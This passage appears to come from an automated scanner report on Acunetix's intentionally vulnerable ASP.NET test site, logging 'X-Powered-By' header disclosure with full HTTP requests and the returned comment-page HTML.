class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a> <DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=2
Method	GET
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 330 bytes.	GET http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 14397
Response Body - size: 14,397 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WBB8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT8fAAUSUmVhZE5ld3MuYXNweD9pZD0yZAIHDxYCHwEFrAIyMSBKdWx5IDIwMDUgLSBTdGFydC11cCBjb21wYW55IEFjdW5ldGl4IHJlbGVhc2VkIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXI6IGEgdG9vbCB0byBhdXRvbWF0aWNhbGx5IGF1ZGl0IHdlYnNpdGUgc2VjdXJpdHkuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgMiBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUsIGxhdW5jaGVzIHBvcHVsYXIgd2ViIGF0dGFja3MgKFNRTCBJbmplY3Rpb24gZXRjLikgYW5kIGlkZW50aWZpZXMgdnVsbmVyYWJpbGl0aWVzIHRoYXQgbmVlZCB0byBiZSBmaXhlZC5kZLQBJ3hOt3r5jKtYjVFFKdowCSWC" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKpxZClDQKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBKShEjjcO8QZ+TqRo3QvanE8jv9G" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <a href="ReadNews.aspx?id=2" id="anchNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</a> <DIV id="divNewsShort" class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=3
Method	GET
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 330 bytes.	GET http://testaspnet.vulnweb.com/Comments.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WBB8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhHwAFElJlYWROZXdzLmFzcHg/aWQ9M2QCBw8WAh8BBagBMjYgSmFudWFyeSAyMDA1IC0gQSBiZXRhIHZlcnNpb24gb2YgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciBoYXMgYmVlbiByZWxlYXNlZCB0b2RheS4gVGhlIGJldGEgaXMgYXZhaWxhYmxlIGZvciBkb3dubG9hZCBhdCBodHRwOi8vd3d3LmFjdW5ldGl4LmNvbS9kb3dubG9hZC8uZGQzP/MHHnstJY/fWtD4cYSdoYkheQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQLj8dP9DwKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBI1RRJ3EGUKdWdAQOQ9gMGQKbUn7" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <a href="ReadNews.aspx?id=3" id="anchNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a> <DIV id="divNewsShort" class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD 